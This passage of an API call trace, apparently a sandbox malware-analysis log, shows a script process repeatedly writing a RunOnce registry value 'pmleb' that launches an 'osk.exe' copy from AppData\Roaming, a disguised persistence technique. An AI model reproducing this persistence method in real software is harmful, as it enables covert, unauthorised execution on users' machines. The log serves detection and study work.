0x1 [0082.359] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.359] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.359] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, 
[7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.359] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.359] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.360] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6f [0082.360] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.360] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x70 [0082.360] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, 
pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.360] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6f [0082.360] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.360] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.361] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.361] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.361] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.361] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.361] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.361] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.361] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.361] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.361] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0082.361] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.361] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.361] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.361] RegCloseKey (hKey=0x280) returned 0x0 [0082.361] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.361] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.361] SetTimer (hWnd=0x20280, nIDEvent=0x20eb, uElapse=0xa, lpTimerFunc=0x0) returned 0x20eb [0082.362] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.373] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.373] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.374] KillTimer (hWnd=0x20280, uIDEvent=0x20eb) returned 1 [0082.374] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.374] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.374] IUnknown:Release (This=0x787518) returned 0x1 [0082.374] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.374] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.374] FileSystemObject:IDispatch:Invoke (in: 
This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.375] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.375] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.375] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.375] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.375] FileSystemObject:IUnknown:QueryInterface (in: 
This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.375] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.375] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x70 [0082.375] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.375] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x71 [0082.375] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.376] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x70 
[0082.376] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.376] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.376] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.376] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.376] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.376] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.376] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.376] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0082.376] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 
lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.377] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.377] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.377] RegCloseKey (hKey=0x280) returned 0x0 [0082.377] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.377] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.377] SetTimer (hWnd=0x20280, nIDEvent=0x20ec, uElapse=0xa, lpTimerFunc=0x0) returned 0x20ec [0082.377] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.389] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.389] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.389] KillTimer (hWnd=0x20280, uIDEvent=0x20ec) returned 1 [0082.389] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.389] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.390] IUnknown:Release (This=0x787518) returned 0x1 [0082.390] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.390] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.390] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, 
[5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0082.390] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0082.390] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0082.390] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0082.390] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0082.390] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, 
[5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0082.390] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0082.390] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x71 [0082.390] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0082.390] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x72 [0082.391] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0082.391] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x71 [0082.391] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.392] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0082.392] 
IUnknown:Release (This=0x7a9740) returned 0x1 [0082.392] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0082.392] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0082.392] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0082.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0082.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0082.392] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0082.392] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0082.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0082.392] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0082.392] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0082.392] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0082.392] RegCloseKey (hKey=0x280) returned 0x0 [0082.393] IUnknown:Release (This=0x7a9740) returned 0x1 [0082.393] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.393] SetTimer (hWnd=0x20280, nIDEvent=0x20ed, uElapse=0xa, lpTimerFunc=0x0) returned 0x20ed [0082.393] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0082.406] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0082.406] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0082.406] KillTimer (hWnd=0x20280, uIDEvent=0x20ed) returned 1 [0082.406] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0082.406] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0082.406] IUnknown:Release (This=0x787518) returned 0x1 [0082.406] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0082.407] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0082.407] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, 
